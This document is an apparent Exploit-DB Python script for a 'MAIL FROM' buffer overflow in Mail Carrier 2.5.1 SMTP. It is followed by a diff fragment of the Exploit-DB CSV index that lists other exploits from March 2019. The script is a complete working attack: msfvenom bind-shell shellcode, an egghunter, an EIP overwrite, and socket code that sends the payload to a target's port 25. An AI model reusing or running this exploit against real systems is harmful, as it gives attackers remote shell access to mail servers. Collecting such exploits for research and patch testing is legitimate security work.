# Tested on Windows Vista Home Basic SP 2
import sys
import socket
import time
if len(sys.argv) < 2:
print "[-]Usage: %s <target addr> " % sys.argv[0]
sys.exit(0)
ipaddr=sys.argv[1]
port=25
callebx="\xb1\x32\x9c\x0f"
sled="\x90" * 8
egg="T00WT00W"
pay=egg
#msfvenom -p windows/shell_bind_tcp LPORT=19397 -b='\x00' -e
x86/shikata_ga_nai -f py | sed 's/buf/pay/g'
#[-] No platform was selected, choosing Msf::Module::Platform::Windows
from the payload
#[-] No arch selected, selecting arch: x86 from the payload
#Found 1 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of py file: 1710 bytes
pay += "\xd9\xe9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbe\x8c"
pay += "\x69\xbd\xa0\x31\x72\x17\x03\x72\x17\x83\x4e\x6d\x5f"
pay += "\x55\xb2\x86\x1d\x96\x4a\x57\x42\x1e\xaf\x66\x42\x44"
pay += "\xa4\xd9\x72\x0e\xe8\xd5\xf9\x42\x18\x6d\x8f\x4a\x2f"
pay += "\xc6\x3a\xad\x1e\xd7\x17\x8d\x01\x5b\x6a\xc2\xe1\x62"
pay += "\xa5\x17\xe0\xa3\xd8\xda\xb0\x7c\x96\x49\x24\x08\xe2"
pay += "\x51\xcf\x42\xe2\xd1\x2c\x12\x05\xf3\xe3\x28\x5c\xd3"
pay += "\x02\xfc\xd4\x5a\x1c\xe1\xd1\x15\x97\xd1\xae\xa7\x71"
pay += "\x28\x4e\x0b\xbc\x84\xbd\x55\xf9\x23\x5e\x20\xf3\x57"
pay += "\xe3\x33\xc0\x2a\x3f\xb1\xd2\x8d\xb4\x61\x3e\x2f\x18"
pay += "\xf7\xb5\x23\xd5\x73\x91\x27\xe8\x50\xaa\x5c\x61\x57"
pay += "\x7c\xd5\x31\x7c\x58\xbd\xe2\x1d\xf9\x1b\x44\x21\x19"
pay += "\xc4\x39\x87\x52\xe9\x2e\xba\x39\x66\x82\xf7\xc1\x76"
pay += "\x8c\x80\xb2\x44\x13\x3b\x5c\xe5\xdc\xe5\x9b\x0a\xf7"
pay += "\x52\x33\xf5\xf8\xa2\x1a\x32\xac\xf2\x34\x93\xcd\x98"
pay += "\xc4\x1c\x18\x34\xcc\xbb\xf3\x2b\x31\x7b\xa4\xeb\x99"
pay += "\x14\xae\xe3\xc6\x05\xd1\x29\x6f\xad\x2c\xd2\xc4\xeb"
pay += "\xb8\x34\xb0\xe3\xec\xef\x2c\xc6\xca\x27\xcb\x39\x39"
pay += "\x10\x7b\x71\x2b\xa7\x84\x82\x79\x8f\x12\x09\x6e\x0b"
pay += "\x03\x0e\xbb\x3b\x54\x99\x31\xaa\x17\x3b\x45\xe7\xcf"
pay += "\xd8\xd4\x6c\x0f\x96\xc4\x3a\x58\xff\x3b\x33\x0c\xed"
pay += "\x62\xed\x32\xec\xf3\xd6\xf6\x2b\xc0\xd9\xf7\xbe\x7c"
pay += "\xfe\xe7\x06\x7c\xba\x53\xd7\x2b\x14\x0d\x91\x85\xd6"
pay += "\xe7\x4b\x79\xb1\x6f\x0d\xb1\x02\xe9\x12\x9c\xf4\x15"
pay += "\xa2\x49\x41\x2a\x0b\x1e\x45\x53\x71\xbe\xaa\x8e\x31"
pay += "\xce\xe0\x92\x10\x47\xad\x47\x21\x0a\x4e\xb2\x66\x33"
pay += "\xcd\x36\x17\xc0\xcd\x33\x12\x8c\x49\xa8\x6e\x9d\x3f"
pay += "\xce\xdd\x9e\x15"
egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# Build the Buffer
buffer="A" * 700 # 5088 to EIP
buffer+=pay
buffer+="B" * (5088 - (700 + len(pay)))
buffer+=callebx # Overwrite EIP with Call EBX in c:\Windows\System32\expsrv.dll
buffer+=sled # 5100 bytes mark
buffer+="C" * 516 # This put us at the EBX register
buffer+=sled # NOPS
buffer+=egghunter
buffer+="D" * (5900 - len(buffer)) # Padding
try:
print "[-] Attacking Tab MailC Carrier MAIL FROM: with %s bytes" %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect ((ipaddr, port)) # Connect to IP & SMTP port
s.recv(1024) # receive banner
s.send('EHLO root@localhost \r\n') # send EHLO
s.recv(1024) # receive reply
s.send('MAIL FROM: ' + buffer + '\r\n') # Send the phony Mail From
s.recv(1024)
s.send('RCPT TO: evelyn@evelyn \r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[-] Done!"
except:
print "[-] Could not connect to target"
exit()

View file

@ -17253,6 +17253,7 @@ id,file,description,date,author,type,platform,port
46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows,
46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40987,3 +40988,9 @@ id,file,description,date,author,type,platform,port
46538,exploits/php/webapps/46538.txt,"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting",2019-03-13,"Gionathan Reale",webapps,php,443
46541,exploits/php/webapps/46541.html,"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)",2019-03-14,LiquidWorm,webapps,php,
46542,exploits/php/webapps/46542.py,"Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution",2019-03-14,R3zk0n,webapps,php,80
46545,exploits/multiple/webapps/46545.txt,"NetData 1.13.0 - HTML Injection",2019-03-15,s4vitar,webapps,multiple,
46546,exploits/php/webapps/46546.py,"CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload",2019-03-15,"Daniele Scanu",webapps,php,80
46548,exploits/php/webapps/46548.txt,"ICE HRM 23.0 - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80

Can't render this file because it is too large.